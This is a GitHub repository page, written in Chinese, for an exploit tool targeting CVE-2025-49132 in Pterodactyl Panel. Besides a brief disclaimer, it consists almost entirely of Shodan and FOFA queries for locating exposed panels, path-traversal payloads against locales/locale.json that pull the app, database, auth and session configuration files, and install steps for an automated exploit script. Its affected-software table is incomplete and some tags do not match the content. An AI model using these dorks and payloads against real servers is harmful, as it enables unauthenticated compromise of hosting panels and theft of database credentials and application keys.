yurahshell/CVE-2025-49132
GitHub: yurahshell/CVE-2025-49132
针对 Pterodactyl Panel CVE-2025-49132 未经身份验证远程代码执行漏洞的概念验证利用工具,提供侦察语法、Payload 模板和自动化利用脚本。
Stars: 0 | Forks: 0
# CVE-2025-49132 — Pterodactyl RCE
## 🧠 什么是 CVE-2025-49132 ?
Pterodactyl panel 中的一个严重 ACE 漏洞,允许**未经身份验证的远程攻击者**执行任意代码 — 可能导致**整个系统被完全攻陷**。
无需身份验证。只需一个存在漏洞的实例。
## ⚠️ 免责声明
## **仅用于教育和授权的渗透测试目的。**
## 🔍 信息侦察
**Shodan**
```
http.title:"Pterodactyl"
```
**FOFA**
```
"Pterodactyl"
```
## 💽 Payloads
```
locales/locale.json?locale=../../../pterodactyl&namespace=config/app
locales/locale.json?locale=../../../pterodactyl&namespace=config/database
locales/locale.json?locale=../../../pterodactyl&namespace=config/auth
locales/locale.json?locale=../../../pterodactyl&namespace=config/session
```
## 📦 安装说明
```
git clone https://github.com/yurahshell/CVE-2025-49132
cd CVE-2025-49132
pip install -r requirements.txt
```
## 🎯 受影响软件
| 软件 | 状态 |
|---|---|
| Pterodactyl Panel |
## 📄 参考资料
- [NVD - CVE-2025-49132](https://nvd.nist.gov/vuln/detail/CVE-2025-49132)
- [Pterodactyl](https://pterodactyl.io)
标签:CISA项目, CVE, Python, Web安全, 安全, 数字签名, 无后门, 蓝队分析, 超时处理, 逆向工具